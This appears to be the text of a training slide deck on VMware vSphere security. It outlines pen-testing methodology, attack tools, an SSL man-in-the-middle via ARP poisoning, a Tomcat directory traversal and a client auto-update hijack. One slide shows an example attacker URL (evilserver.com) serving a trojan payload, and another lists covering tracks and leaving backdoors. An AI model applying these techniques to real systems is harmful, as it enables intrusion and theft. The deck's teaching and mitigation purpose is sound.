Slide 1

Slide 2

Free Drawing for 1 seat in the VMware Advanced Security Class with Firebrand.

Slide 3

vSphere Just Another Layer to Attack? Recent Cases involving VMware Pen Testing Methodology Gueststealer TomCat Zero Day Directory Traversal VASTO Mitigation Techniques 3 rd Party Mitigation Tools

Slide 4

VMware 80% of the Market Share Do the Tools used in Pen Testing work with virtualization? Are there hacks being designed just for VMware? What is this costing us?

Slide 5

CyberCrime and CyberWar Predictions for 2011 #2 Cloud Computing and Virtual Machines (VM) will be specifically targeted by cybercriminals and cyber terrorists resulting in VM malware and Cloud downtime and Cloud data theft. Hackin9 Issue 01/2011(37)

Slide 6

What are the main security concerns associated with virtualization in general? Segregation of Duties Accounting/Logging New APIs VMsafe vStorage vNetwork VMsafe Virtual Appliances Plug-Ins Share Resources can they be attacked? Memory, CPU, Datastore

Slide 7

vSphere Client APIs Plugins - VMware Update Manager Guided Consolidation VMware Converter Storage vMotion Plugins - 3rd Party Back Up Solutions (3rd Party - Veeam) RDP - (3rd Party - The RDP plug-in, by Juxtaposition) Invoke Plugin Management Interfaces

Slide 8

ESX and vCenter both use a Web Service vCenter on by default Why? ESX disabled Thank God Tomcat Web Service How many holes have we found here? WOW Utilizes a Proxy The is the same proxy used by hostd.

Slide 9

VMware is using an old version of TomCat that leaves the username and password in a world readable file! Fixed by a recent update for vCenter 4.1

Slide 10

It provides communication between VMs and trusted endpoints on the host, and from VM to VM. The vmkernel is considered a trusted end-point. This interface is implemented as a virtual PCI device, present by default in all VMs created with virtual hardware version 7. VMCI, or Virtual Machine Communications Interface is an interface designed in the hardware of a VM. http://pubs.vmware.com/vmci-sdk/VMCI_intro.html

Slide 11

Threats Perceived Known Risks Probability Potential Impact

Slide 12

Secunia Historic Advisories ESX 4.x ESXi 4.x vCenter Server 4.x nvd.nist.gov Over 40 Vulnerabilities for VMware Products McAfee Threats VMware ESX Server Heap Buffer Overflow vCenter Update Manager CSS vCenter Update Manager Directory Traversal

Slide 13

130 Million Credit Cards Stolen Gonzalez Indictment SQL Injection Attacks SQL Injection Strings Malware Root kits Visiting the stores Disabling the logs Using Proxies Little Known Fact: Occurred on VMware!!!!

Slide 14

This does not change, regardless of the environment being tested. Information Gathering Scanning Enumeration Penetration Fail Start Over or tell them great job Succeed Escalate Privileges Steal Data or Leave proof of hack Cover Tracks Leave Backdoors

Slide 15

Google NMAP Since v4.8 Ettercap Cain and Abel Metasploit Claudio Criscione VASTO Virtualization ASsessment TOolkit

Slide 16

Slide 17

Slide 18

We have to find the systems first. Just like any other service, ESX has its own tells. NMAP will give you what you need. Lets see this in action!

Slide 19

Yes you can create your own modules. We will take a look at VASTO Virtualization ASsessment Toolkit by Claudio Criscione Auxiliary Modules The purpose of meterpreter scripts are to give end-users an easy interface to write quick scripts that can be run against remote targets after successful exploitation. (Metasploit) Meterpreter is an effective tool for creating backdoors. Meterpreter

Slide 20

ARP Cache Poisoning will allow us to perform a successful SSL crack! The hacking tools will create fake certificates. Two simultaneous SSL connections are established. One between the victim and the hacker, the other between the hacker and the real server. The communication process starts on port 443 and once the SSL authentication has been established VMware moves the communication to port 902. SSL request SSL reply (Fake certificate) SSL request SSL reply (Real Self Signed Cert) F&JLMDHGST*KUP)JDGH$FDSD@ Cleartext Copy & Alter Stop ESX Sever

Slide 21

VIC Client Login VIC Client Login

Slide 22

Slide 23

Slide 24

You are still vulnerable even if you use vCenter. I can offer this: Once the above password is stolen you can login to the host with the vpxuser and above password.

Slide 25

VULNERABLE VERSIONS Server VMware Server 2.x < 2.0.2 build 203138 (Linux) VMware Server 1.x < 1.0.10 build 203137 (Linux) ESX/ESXi ESX 3.5 w/o ESX350-200901401-SG ESX 3.0.3 w/o ESX303-200812406-BG ESXi 3.5 w/o ESXe350-200901401-I-SG

Slide 26

Thanks for the Virtual Machines! GuestStealer How Large is your dictionary file? Dictionary Attack Need to know exactly what is running? Fingerprinting Tool

Slide 27

Auto Update Process 3.0.0 3.1.0 https://*/client/VMware-viclient.exe ClientServer 1 2 3 4 GET /client/clients.xml AutoUpdate URL RetrieveServiceInstance ServiceInstance RetrieveServiceStatus Status GET /client/clients.xml Autoupdate URL Login

Slide 28

The Auto Update Process 3.0.0 3.1.0 https://*/client/VMware- viclient.exe The Evil Guy 10.0.0 3.1.0 https://evilserver.com/evilpay poad.exe

Slide 29

Change the clients.xml filename The package will run under the users privilege! Administrator Anyone? Provide your nasty trojan package. Could be combined with other attacks. Create a fake web interface so you look ligit! This can be done as MiTM or Rouge Server You will trigger a certificate error

Slide 30

Autopwn How easy can it get? Uses a flaw in the Tomcat Web Server Transfers the Latest Session File from vCenter using a Directory Traversal Attack. Admin rights without knowing a username or password!

Slide 31

Vmware vShield Zones 3rd Party Altor Reflex CheckPoint Astaro Security Gateway Tripwire Catbird HyTrust Mitigation Tools Best of the Breed

Slide 32

Slide 33

Slide 34

Trend Micro Deep Security provides advanced security for physical, virtual, and cloud servers and virtual desktops. Modules Agentless Malware Detection for VMs Deep Packet Inspection Intrusion Detection and Prevention Web Application and Protection Application Control Bidirectional Stateful Firewall Integrity Monitoring Log Inspection

Slide 35

Slide 36

Catbird TrustZones policy- based security envelope for virtual infrastructures and the cloud. Enforces protection and measures compliance across virtual clusters and data centers. Catbird virtual security appliance performs several functions: Hypervisor auditing Virtual network IPS Network segmentation and access control Vulnerability management Multi-tenant security Reports to management console Catbird virtual security appliance performs several functions: Hypervisor auditing Virtual network IPS Network segmentation and access control Vulnerability management Multi-tenant security Reports to management console

Slide 37

Catbird appliances collect data and enforce policies Appliances report events to management console Management console analyses events and correlates to compliance framework

Slide 38

1. Course Introduction and Methodology 2. Penetration Testing 101 3. Primer and Reaffirming our Knowledge 4. Security Architecture, vCPU, vMemory 5. Routing and the vNetwork 6. vStorage Architecture and Security Implementations 7. Hardening the Virtual Machines 8. Hardening the Host 9. Hardening Virtual Center 10. Virtualizing your DMZ 11. 3rd Party Mitigation Tools 12. Putting it all Together

Slide 39

1. Course Intro & Methodology 2. Virtualization Overview 3. Planning & Installing ESX/ESXi 4 4. Using Tools to Administer a VMware Environment 5. Configuring Networking 6. Configuring Storage 7. vCenter Server 4 and Licensing 8. VM Creation and Configuration & Snapshots 9. Security and Permissions 10. Server and VM Monitoring 11. Advanced ESX and vCenter Management 12. Patching and Upgrading ESX/ESXi 13. Disaster Recovery and Backup 50 Hours of Training 6.5 Classes in ONE

Slide 40

Does vSphere really have some major issues? Recent Cases involving ESX Pen Testing Methodology Web Related issues VASTO Mitigation techniques Questions?